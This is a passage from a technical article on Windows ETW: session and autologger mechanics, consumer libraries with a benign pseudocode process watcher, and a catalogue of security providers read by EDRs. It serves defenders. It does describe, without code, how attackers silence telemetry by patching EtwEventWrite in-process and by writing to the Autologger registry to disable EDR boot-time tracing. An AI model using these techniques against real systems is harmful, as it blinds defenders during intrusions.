&lt;td&gt;Legacy components; NT Kernel Logger&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WPP&lt;/td&gt;
&lt;td&gt;~2002&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.pdb&lt;/code&gt; (TMF)&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;No -- needs producer PDB&lt;/td&gt;
&lt;td&gt;In-tree Windows kernel dev-time tracing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manifest-based&lt;/td&gt;
&lt;td&gt;2007 (Vista)&lt;/td&gt;
&lt;td&gt;XML manifest, system-installed&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Needs installed manifest&lt;/td&gt;
&lt;td&gt;Shipping security telemetry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TraceLogging&lt;/td&gt;
&lt;td&gt;2015 (Win10)&lt;/td&gt;
&lt;td&gt;Inline TLV in payload&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;New apps and services; cross-runtime&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Sources for the table: [@ms-about-etw, @ms-etw-config, @ms-tracelogging-about, @ms-wpp].&lt;/p&gt;

For new shipping Windows components with a known event vocabulary and high volume, choose manifest-based: smallest per-event size, evtx integration, eight-consumer concurrency. For new cross-runtime open-source providers where deployment friction matters, choose TraceLogging: same eight-consumer concurrency, no XML to author, decodable everywhere. For in-source-tree dev-time tracing inside a binary you already have symbols for, WPP is fine. For new security-relevant providers, never choose classic: the one-session cap is structurally incompatible with multi-EDR coexistence.
&lt;p&gt;Four provider classes, four trade-offs. But every one of them shares a structural weakness: the producer fires from inside the calling process, and any code in that process can patch the runtime entry-point and silence the provider for itself. That is the weakness Adam Chester made famous in 2020, and the one EtwTi was built to defeat.&lt;/p&gt;
&lt;h2&gt;6. Sessions, buffers, and the autologger registry: where the telemetry actually lives&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;regedit&lt;/code&gt; on a Windows host and navigate to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger&lt;/code&gt;. You are looking at the persistence surface of every trace session that survives a reboot on this machine -- and the persistence surface every modern EDR uses to install itself.&lt;/p&gt;
&lt;p&gt;A session is the unit ETW actually exposes to controllers. It owns a per-session pool of buffers, a writer thread, a destination (file or real-time consumer), and a list of providers it has subscribed to. The lifecycle is short. A controller fills out an &lt;code&gt;EVENT_TRACE_PROPERTIES&lt;/code&gt; structure [@ms-event-trace-props] [@ms-event-trace-props] with a session name, buffer size, logging mode, and destination, then calls &lt;code&gt;StartTrace&lt;/code&gt;. The kernel allocates the buffers -- at least two per logical processor [@ms-event-trace-props] [@ms-event-trace-props] -- and returns a session handle. The controller then calls &lt;code&gt;EnableTraceEx2&lt;/code&gt; [@ms-enabletraceex2] [@ms-enabletraceex2] for each provider it wants to subscribe to, passing &lt;code&gt;EVENT_CONTROL_CODE_ENABLE_PROVIDER&lt;/code&gt; along with the provider GUID, level, and keyword bitmask.&lt;/p&gt;
&lt;p&gt;If the provider&apos;s per-class session cap is already saturated, &lt;code&gt;EnableTraceEx2&lt;/code&gt; returns &lt;code&gt;ERROR_NO_SYSTEM_RESOURCES&lt;/code&gt;. If the caller lacks the privilege to enable that provider, it returns &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. We will see both error codes again later, on different paths.The default buffer size sweet spot is small. The Microsoft Learn primary states it explicitly: &quot;Trace sessions with large buffers (256KB or larger) should be used only for diagnostic investigations or testing, not for production tracing.&quot; [@ms-event-trace-props] Production session buffer sizes typically sit in the 32-64KB range.&lt;/p&gt;
&lt;p&gt;There are three logging modes. &lt;em&gt;File mode&lt;/em&gt; writes events to a sequential &lt;code&gt;.etl&lt;/code&gt; file on disk; the writer thread drains buffers to disk and the file grows. &lt;em&gt;Circular mode&lt;/em&gt; writes to a fixed-size file in a circular buffer; old events are overwritten when the file fills. &lt;em&gt;Real-time mode&lt;/em&gt; delivers events to a real-time consumer process, which receives them through its registered event-record callback. Defender, EDR sensors, and Sysmon all use real-time mode for their hot paths; they may also write to file as a forensic backup.&lt;/p&gt;

A process that calls `OpenTrace` with `LogFileMode = EVENT_TRACE_REAL_TIME_MODE` and receives events live via a registered callback rather than from an `.etl` file on disk. Real-time consumers must keep up with producer rate or events are lost.
&lt;p&gt;The autologger registry path is what makes a session survive a reboot. A subkey under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\&amp;lt;SessionName&amp;gt;&lt;/code&gt; defines a session that the kernel starts at boot, before most user-mode services are running. Each subkey&apos;s values configure the session: &lt;code&gt;BufferSize&lt;/code&gt;, &lt;code&gt;MaximumBuffers&lt;/code&gt;, &lt;code&gt;LogFileMode&lt;/code&gt;, &lt;code&gt;FileName&lt;/code&gt;, plus a nested &lt;code&gt;&amp;lt;SessionName&amp;gt;\&amp;lt;ProviderGuid&amp;gt;&lt;/code&gt; subkey for each provider to enable.&lt;/p&gt;

A registry-persisted boot-time ETW session. The kernel reads `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\` at boot, creates the session, enables the configured providers, and begins capture before user-mode services start. Defender&apos;s Sense agent, CrowdStrike&apos;s Falcon sensor, and Sysmon&apos;s driver all install autologgers here.
&lt;p&gt;Defender&apos;s &lt;code&gt;DiagTrack&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-Diagnosis-PCW&lt;/code&gt;, the SQM kernel logger, the EventLog-Application channel autologger -- all live here (observable via &lt;code&gt;logman query -ets&lt;/code&gt; on a stock Windows install). Third-party EDRs add their own. The Palantir CIRT taxonomy [@palantir-tampering-wayback] (about which more in section 11) frames this registry surface as the persistent-tampering target: an attacker who can write to this subtree can disable an EDR&apos;s boot-time tracing without ever interacting with the running EDR process. The events of interest never get captured because the session never starts.&lt;/p&gt;
&lt;p&gt;There is a related concept worth naming: the &lt;em&gt;Global Logger&lt;/em&gt;. This is a special autologger session whose configuration lives in &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\GlobalLogger&lt;/code&gt;. It is the boot-time tracing path that comes online before any user-mode service, including before Sense and the EDR sensor. It exists to capture early-boot kernel events that no later session can record.&lt;/p&gt;

flowchart TD
    R[HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\] --&amp;gt; S1[DiagTrack-Listener]
    R --&amp;gt; S2[Defender-Listener]
    R --&amp;gt; S3[ThirdPartyEDR-Sensor]
    R --&amp;gt; SG[GlobalLogger]
    S2 --&amp;gt; S2P[Provider GUIDs subkeys]
    S2 --&amp;gt; S2C[BufferSize / MaximumBuffers / LogFileMode]
    S2 --&amp;gt; S2F[FileName=.etl path]
    S2P --&amp;gt; KS[Kernel reads at boot]
    S2C --&amp;gt; KS
    S2F --&amp;gt; KS
    KS --&amp;gt; Started[Session started before user-mode services]
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;logman query -ets&lt;/code&gt; enumerates every live trace session on the host. Cross-reference against the subkeys in &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\&lt;/code&gt; to find sessions configured to start at boot. Any unauthorised entry -- a session you do not recognise, an autologger pointed at a destination outside your EDR&apos;s data path, a provider GUID you cannot account for -- belongs in your incident response queue. We return to this in section 14.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;ERROR_NO_SYSTEM_RESOURCES&lt;/code&gt; from &lt;code&gt;EnableTraceEx2&lt;/code&gt; is the runtime symptom of the eight-session cap binding [@ms-enabletraceex2]. SOC engineers debugging multi-EDR coexistence problems should look for it in their sensor&apos;s diagnostic output. Eight subscribers per manifest provider is enough for the typical Defender + third-party EDR + Sysmon + research tap arrangement, but a host running multiple research-mode tracers can saturate it.&lt;/p&gt;
&lt;p&gt;Persistence solved: a session the OS starts at every boot. But who reads it? That requires a consumer process, and consumers are where the architecture forks along the security spectrum.&lt;/p&gt;
&lt;h2&gt;7. Consumer architecture: from &lt;code&gt;OpenTrace&lt;/code&gt; to KrabsETW to a 30-line process watcher&lt;/h2&gt;
&lt;p&gt;The consumer side of ETW is mechanically simple -- three calls to open a trace, register a callback, and process events -- but the choice of library tells you almost everything about what kind of EDR you are building.&lt;/p&gt;
&lt;p&gt;The native pattern is three Win32 calls. &lt;code&gt;EnableTraceEx2&lt;/code&gt; subscribes the session to a provider GUID with a level and keyword bitmask. &lt;code&gt;OpenTrace&lt;/code&gt; returns a handle on the session for consumption. &lt;code&gt;ProcessTrace&lt;/code&gt; blocks the calling thread, drains events from the kernel&apos;s per-CPU buffers, and dispatches each one to a registered callback. Each event arrives as an &lt;code&gt;EVENT_RECORD&lt;/code&gt; containing a header (provider GUID, event ID, level, keyword, opcode, timestamp, process ID, thread ID) and a payload that the consumer decodes.&lt;/p&gt;
&lt;p&gt;For manifest providers the consumer decodes via TDH (the Trace Data Helper API) against the system-installed manifest. For TraceLogging providers the consumer decodes from the inline TLV payload. For classic and WPP providers the consumer needs the MOF schema or the producer&apos;s PDB respectively.&lt;/p&gt;

The Win32 decoder API that turns a raw `EVENT_RECORD` payload into typed fields, using the registered manifest as the schema source. `TdhGetEventInformation` returns a `TRACE_EVENT_INFO` structure with the field names, types, and offsets; `TdhFormatProperty` extracts each field. TDH is what makes manifest events self-describing at the consumer end, even though the schema lives out of band.

sequenceDiagram
    participant C as Consumer process
    participant K as Kernel ETW subsystem
    participant P as Provider process
    C-&amp;gt;&amp;gt;K: StartTrace(session)
    C-&amp;gt;&amp;gt;K: EnableTraceEx2(session, providerGuid, level, keyword)
    K--&amp;gt;&amp;gt;P: Provider notified to begin emitting
    C-&amp;gt;&amp;gt;K: OpenTrace(session)
    K--&amp;gt;&amp;gt;C: TraceHandle
    C-&amp;gt;&amp;gt;K: ProcessTrace(handle) [blocking]
    P-&amp;gt;&amp;gt;K: EventWrite(payload)
    K--&amp;gt;&amp;gt;C: callback(EVENT_RECORD)
    P-&amp;gt;&amp;gt;K: EventWrite(payload)
    K--&amp;gt;&amp;gt;C: callback(EVENT_RECORD)
    Note over C,K: ProcessTrace returns only when session ends
&lt;p&gt;In production almost no one writes the raw three-call pattern. The library universe settled into a small set of widely-used wrappers, and the choice of wrapper maps almost one-to-one onto the kind of EDR the engineering team is building.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;krabsetw&lt;/strong&gt; [@gh-krabsetw] [@gh-krabsetw] is a Microsoft-authored C++ library that simplifies session and provider management. Its README explicitly notes the production caller: a C++/CLI wrapper called &lt;code&gt;Microsoft.O365.Security.Native.ETW&lt;/code&gt;, &quot;used in production by the Office 365 Security team. It&apos;s affectionately referred to as Lobsters.&quot; If you are building an in-house EDR or a security analytics pipeline in C++ on Windows, krabsetw is the default choice.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft.Diagnostics.Tracing.TraceEvent&lt;/strong&gt; [@nuget-traceprocessing] [@nuget-traceprocessing] is the general-purpose .NET ETW library, distributed as a NuGet package and used heavily inside the .NET diagnostics community. Microsoft&apos;s separate &lt;code&gt;Microsoft.Windows.EventTracing.Processing.All&lt;/code&gt; package is the .NET TraceProcessing API [@ms-etw-portal] [@ms-etw-portal] that the Windows engineering team uses internally to analyze ETW data from the Windows engineering system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SilkETW&lt;/strong&gt; [@gh-silketw] [@gh-silketw], originally released by Ruben Boonen at FireEye in March 2019 [@fireeye-silketw-launch] [@fireeye-silketw-launch] (now maintained by Mandiant), wraps &lt;code&gt;Microsoft.Diagnostics.Tracing.TraceEvent&lt;/code&gt; to expose ETW telemetry to detection-engineering and threat-hunting workflows. SilkETW is the canonical &quot;blue team research&quot; consumer: the tool you reach for when you want to see what events a provider actually emits without writing C++.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sealighter&lt;/strong&gt; [@gh-sealighter] [@gh-sealighter], by &lt;code&gt;pathtofile&lt;/code&gt;, is a krabsetw-wrapping C++ tool that makes multi-provider subscription and filtering tractable from a JSON config. The README states: &quot;Sealighter leverages the feature-rich Krabs ETW Library to enable detailed filtering and triage of ETW and WPP Providers and Events.&quot; Sealighter is the canonical &quot;red/blue team triage&quot; consumer: more flexible than SilkETW, less code to write than raw krabsetw.&lt;/p&gt;
&lt;p&gt;The pitfalls are universal across all four libraries. The krabsetw README spells two of them out:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The call to &apos;start&apos; on the trace object is blocking so thread management may be necessary.&quot; -- [@gh-krabsetw]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Throwing exceptions in the event handler callback ... will cause the trace to stop processing events.&quot; -- [@gh-krabsetw]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Both have caused real production outages. An EDR that throws an unhandled exception in its event callback dies silently as an ETW consumer, and the next event the provider emits goes nowhere.The &quot;throwing in the callback stops the trace&quot; pitfall is the gotcha that bites every team writing their first ETW consumer. The kernel does not catch the exception; the trace simply ends. A production-quality consumer wraps every callback in try/catch (or its language equivalent) and routes failures through a side channel, not through the trace itself.&lt;/p&gt;
&lt;p&gt;To make the structure concrete, here is what a 30-line &lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt; real-time consumer looks like, written in TypeScript pseudocode that mirrors the structure a Sealighter or krabsetw user would write:&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode: the structure of a krabsetw / Sealighter consumer
// for the Microsoft-Windows-Kernel-Process provider.&lt;/p&gt;
&lt;p&gt;const KERNEL_PROCESS_GUID = &quot;{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}&quot;;&lt;/p&gt;
&lt;p&gt;const session = new UserTraceSession(&quot;MyEdrSensor&quot;);&lt;/p&gt;
&lt;p&gt;const provider = new Provider(KERNEL_PROCESS_GUID);
provider.level = TraceLevel.Information;
provider.anyKeyword = 0xFFFFFFFFFFFFFFFFn;&lt;/p&gt;
&lt;p&gt;provider.onEvent = (event) =&amp;gt; {
  try {
    switch (event.id) {
      case 1: // ProcessStart
        const pid = event.fields.ProcessID;
        const imageName = event.fields.ImageName;
        const cmdLine = event.fields.CommandLine;
        console.log(`Process start pid=${pid} image=${imageName}`);
        break;
      case 2: // ProcessStop
        console.log(`Process stop pid=${event.fields.ProcessID}`);
        break;
      case 5: // ImageLoad
        console.log(`Image load ${event.fields.ImageName} into pid=${event.fields.ProcessID}`);
        break;
    }
  } catch (e) {
    // never let an exception escape the callback
    sideChannelLog(e);
  }
};&lt;/p&gt;
&lt;p&gt;session.enable(provider);
session.start();  // blocks until session.stop() is called
`}&lt;/p&gt;
&lt;p&gt;That code, in production form, is a working EDR sensor&apos;s process watcher. Every commercial Windows EDR has something with the same structure inside it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; krabsetw wraps the C++ surface and is the default for production in-house EDRs. TraceEvent wraps .NET and is the default for diagnostics tooling. SilkETW exposes ETW to detection engineers without C++. Sealighter wraps krabsetw with a config file for triage. Pick the library that matches the team that will own the consumer, not the one that looks most powerful.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is what Sysmon, Wazuh, and Elastic Defend look like under the hood -- a SYSTEM-privileged user-mode service consuming public providers. But there is one provider this code cannot subscribe to. Try it and &lt;code&gt;EnableTraceEx2&lt;/code&gt; returns &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. The next two sections are about the GUID that requires a passport.&lt;/p&gt;
&lt;h2&gt;8. The security provider catalogue: what EDRs actually read&lt;/h2&gt;
&lt;p&gt;There are roughly 1,300 manifest-based providers shipped on a 2026 Windows 11 24H2 install -- the community-maintained jdu2600 inventory [@gh-jdu2600] [@gh-jdu2600] tracks the count across builds, and the repnz manifest archive [@gh-repnz] [@gh-repnz] holds byte-stable copies of the manifests for cross-version diffing. Eight of those providers carry almost all the security telemetry the EDR vendors read. This is the catalogue.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-Security-Auditing&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{54849625-5478-4994-A5BA-3E3B0328C30D}&lt;/code&gt;. The audit-policy-driven Security event log producer. Event ID 4624 (logon), 4625 (failed logon), 4634 (logoff), 4688 (process create with command line) [@learn-microsoft-com-event-4688] [@ms-event-4624], 4689 (process exit), and the broader subcategory audit policy events. This is the closure for the legacy Security event log: when an administrator turns on &quot;audit logon events&quot; in the local security policy, this is the provider that emits the events. EDRs that consume it are reading the same stream the Event Viewer&apos;s Security log shows.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-Kernel-Process&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}&lt;/code&gt;. The canonical real-time process telemetry source for non-PPL EDR. Event ID 1 fires on &lt;code&gt;ProcessStart&lt;/code&gt; with process ID, parent process ID, create time, session ID, and image name (notably &lt;em&gt;not&lt;/em&gt; the command line, which is why command-line visibility requires Sysmon Event ID 1 or Security 4688 with command-line auditing enabled); event ID 2 on &lt;code&gt;ProcessStop&lt;/code&gt;; event ID 3 on thread create; event ID 4 on thread exit; event ID 5 on &lt;code&gt;ImageLoad&lt;/code&gt; with the loaded module name and base address. SilkETW&apos;s launch post enumerates the event record format inline [@fireeye-silketw-launch] [@fireeye-silketw-launch]. This provider is widely cited in EDR community documentation as available since Windows 7, though no Microsoft primary pins the exact build.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-Kernel-File&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-Kernel-Network&lt;/code&gt;, &lt;code&gt;Microsoft-Windows-Kernel-Registry&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The per-subsystem siblings of &lt;code&gt;Kernel-Process&lt;/code&gt;. &lt;code&gt;Kernel-File&lt;/code&gt; surfaces file open / close / read / write / delete operations with the file path and the operating PID. &lt;code&gt;Kernel-Network&lt;/code&gt; surfaces TCP and UDP send / receive with the local and remote endpoints. &lt;code&gt;Kernel-Registry&lt;/code&gt; surfaces registry create / open / set value / delete with the key path and value name. All three use the manifest-based class and inherit the eight-session cap. EDRs that want full-fidelity per-syscall telemetry without writing kernel callbacks subscribe to these three.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Antimalware-Scan-Interface&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{2A576B87-09A7-520E-C21A-4942F0271D67}&lt;/code&gt;, documented in the Microsoft Learn AMSI portal [@ms-amsi-portal] [@ms-amsi-portal] and surveyed in the Palantir CIRT taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback]. This is the ETW provider that surfaces AMSI scan results: a script block submitted by PowerShell, JScript, VBA, an Office macro engine, or any other AMSI client comes through here &lt;em&gt;after deobfuscation&lt;/em&gt;. Whatever string the script engine is about to execute, the registered antimalware engine sees in plaintext, and the result of the scan is published via this provider for any listener.&lt;/p&gt;

A COM interface exposed by Windows since 2015 that script engines and runtime hosts can call into to submit content for malware scanning. The Microsoft Learn AMSI portal lists PowerShell, JScript and VBScript via Windows Script Host, Office VBA macros, and User Account Control as in-box integrators [@ms-amsi-portal]; the .NET CLR&apos;s assembly load path joined the list with .NET Framework 4.8, as documented in Adam Chester&apos;s CLR walk-through [@xpn-hiding-dotnet]. The scanned content is the post-deobfuscation form -- the actual code about to execute, not the obfuscated wrapper. Scan results surface via the `Microsoft-Antimalware-Scan-Interface` ETW provider.
&lt;p&gt;The AMSI Operational event log channel typically appears empty by default. The Palantir taxonomy [@palantir-tampering-wayback] [@palantir-tampering-wayback] notes the keyword bitmask configured for the channel does not surface scan-result events. The events fire on the ETW bus and can be consumed in real time, but they do not land in the user-visible evtx log unless the consumer reconfigures the keyword mask.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-PowerShell&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{a0c1853b-5c40-4b15-8766-3cf1c58f985a}&lt;/code&gt;. Event ID 4104 is the script-block-logging event that records each PowerShell script block before execution; event ID 4103 records pipeline execution detail; event ID 4100 records errors. The Microsoft Learn &lt;code&gt;about_Logging_Windows&lt;/code&gt; reference (Windows PowerShell 5.1) [@ms-powershell-logging] [@ms-powershell-logging] documents EID 4104 verbatim (&quot;&lt;code&gt;EventId 4104 / 0x1008&lt;/code&gt; ... &lt;code&gt;Channel Operational&lt;/code&gt; ... &lt;code&gt;Task CommandStart&lt;/code&gt;&quot;) and the script-block-logging configuration. PowerShell Core 7+ uses a separate ETW provider (&lt;code&gt;PowerShellCore&lt;/code&gt;, GUID &lt;code&gt;{f90714a8-5509-434a-bf6d-b1624c8a19a2}&lt;/code&gt;). Combined with AMSI the two providers give an EDR the executed PowerShell content twice: once at AMSI submission, once at script-block logging. Detection engineers use both as cross-checks.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}&lt;/code&gt;, verbatim in Adam Chester&apos;s PoC source [@xpn-hiding-dotnet] [@xpn-hiding-dotnet]. The .NET CLR provider. Surfaces assembly load events, JIT compilation, AppDomain creation, exception throws. Critical for detecting Cobalt Strike&apos;s &lt;code&gt;execute-assembly&lt;/code&gt; style of in-memory .NET payload loading. This is the provider that goes dark in the section 1 hook scene after the operator&apos;s &lt;code&gt;EtwEventWrite&lt;/code&gt; patch.This is the provider Adam Chester targeted in the canonical March 17, 2020 ETW patching post [@xpn-hiding-dotnet]. The Cobalt Strike &lt;code&gt;execute-assembly&lt;/code&gt; workflow produces a loud signal here -- &quot;assembly X loaded into PID Y from in-memory source Z&quot; -- so silencing it locally was a valuable evasion. The story comes back in section 11.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{5770385F-C22A-43E0-BF4C-06F5698FFBD9}&lt;/code&gt;, surfaced by &lt;code&gt;wevtutil gp Microsoft-Windows-Sysmon&lt;/code&gt; and inventoried in [@gh-jdu2600]; the Microsoft Learn Sysmon page by Russinovich and Garnier [@ms-sysmon] [@ms-sysmon] documents authorship, the protected-process status, and the &lt;code&gt;Microsoft-Windows-Sysmon/Operational&lt;/code&gt; channel. This is the &lt;em&gt;publishing&lt;/em&gt; side of Sysmon. Sysmon&apos;s kernel driver &lt;code&gt;SysmonDrv.sys&lt;/code&gt; collects events through &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; and friends; the user-mode service then republishes via this ETW provider so any consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) can subscribe without writing its own kernel driver. Events also land in the &lt;code&gt;Microsoft-Windows-Sysmon/Operational&lt;/code&gt; evtx channel.&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; (EtwTi)&lt;/h3&gt;
&lt;p&gt;GUID &lt;code&gt;{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}&lt;/code&gt;, verbatim in the fluxsec.red walkthrough [@fluxsec-eti] [@fluxsec-eti]. The only ETW source in the catalogue that fires from inside the kernel for memory-modifying syscalls. Ten task IDs, all prefixed &lt;code&gt;KERNEL_THREATINT_TASK_&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ALLOCVM&lt;/code&gt; (&lt;code&gt;NtAllocateVirtualMemory&lt;/code&gt; -- local and cross-process)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;PROTECTVM&lt;/code&gt; (&lt;code&gt;NtProtectVirtualMemory&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;MAPVIEW&lt;/code&gt; (section mapping; cross-process and self)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;QUEUEUSERAPC&lt;/code&gt; (&lt;code&gt;NtQueueApcThread&lt;/code&gt; cross-process)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SETTHREADCONTEXT&lt;/code&gt; (&lt;code&gt;NtSetContextThread&lt;/code&gt; cross-process)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;READVM&lt;/code&gt; (&lt;code&gt;NtReadVirtualMemory&lt;/code&gt; -- local and cross-process)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;WRITEVM&lt;/code&gt; (&lt;code&gt;NtWriteVirtualMemory&lt;/code&gt; -- local and cross-process)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SUSPENDRESUME_THREAD&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SUSPENDRESUME_PROCESS&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DRIVER_DEVICE&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each task pairs with a 64-bit keyword bitmask that distinguishes &lt;code&gt;LOCAL&lt;/code&gt; vs &lt;code&gt;REMOTE&lt;/code&gt; (cross-process) and &lt;code&gt;KERNEL_CALLER&lt;/code&gt; vs not. The Elastic Security Labs walkthrough [@elastic-doubling-down] [@elastic-doubling-down] lists the named Win32/Nt syscalls that surface here:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider ... VirtualAlloc, VirtualProtect, MapViewOfFile, VirtualAllocEx, VirtualProtectEx, MapViewOfFile2, QueueUserAPC, SetThreadContext, WriteProcessMemory, ReadProcessMemory(lsass)&quot; -- Elastic Security Labs [@elastic-doubling-down] [@elastic-doubling-down]&lt;/p&gt;
&lt;/blockquote&gt;

The kernel-emitted ETW provider for memory-modifying syscalls. GUID `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`. Events are emitted from the kernel side of the syscall path (not from a user-mode trampoline), which makes the provider unreachable from a user-mode patcher in the calling process. Consumption is gated behind Protected Process Light at the Antimalware signer level, paired with an Early Launch Antimalware driver. The provider first shipped in the Windows 10 RS-era; the precise build is not stated verbatim in any Microsoft primary located, with community references converging on no later than 1709.
&lt;p&gt;The first-ship-build is hedged: the provider GUID and task inventory are well-documented in third-party reverse-engineering primaries, but no Microsoft primary located in the source verification stage pins the exact build. The community reference range is Windows 10 1607 (RS1) through 1709 (RS3). The dispositive practical evidence is Yarden Shafir&apos;s 2023 Trail of Bits walkthrough [@trailofbits-shafir] [@trailofbits-shafir], which shows live-debugger output of &lt;code&gt;CSFalconService.exe&lt;/code&gt; (CrowdStrike) holding &lt;code&gt;EtwConsumer&lt;/code&gt; handles to multiple logger IDs simultaneously. By 2023 third-party EDRs were demonstrably consuming EtwTi at scale.&lt;/p&gt;
&lt;h3&gt;The catalogue as a single screen&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider name&lt;/th&gt;
&lt;th&gt;GUID&lt;/th&gt;
&lt;th&gt;Surface&lt;/th&gt;
&lt;th&gt;Gate&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Security-Auditing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{54849625-5478-4994-A5BA-3E3B0328C30D}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Audit-policy events (4624/4625/4688/...)&lt;/td&gt;
&lt;td&gt;None (Local Security Policy)&lt;/td&gt;
&lt;td&gt;[@ms-event-4624]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Kernel-Process&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Process / thread / image-load events&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@fireeye-silketw-launch], [@gh-jdu2600]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Kernel-File&lt;/td&gt;
&lt;td&gt;(manifest archive)&lt;/td&gt;
&lt;td&gt;File I/O syscalls&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@gh-jdu2600], [@gh-repnz]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Kernel-Network&lt;/td&gt;
&lt;td&gt;(manifest archive)&lt;/td&gt;
&lt;td&gt;TCP/UDP send/receive&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@gh-jdu2600], [@gh-repnz]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Windows-Kernel-Registry&lt;/td&gt;
&lt;td&gt;(manifest archive)&lt;/td&gt;
&lt;td&gt;Registry create/open/set/delete&lt;/td&gt;
&lt;td&gt;None (admin)&lt;/td&gt;
&lt;td&gt;[@gh-jdu2600], [@gh-repnz]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft-Antimalware-Scan-Interface&lt;/td&gt;
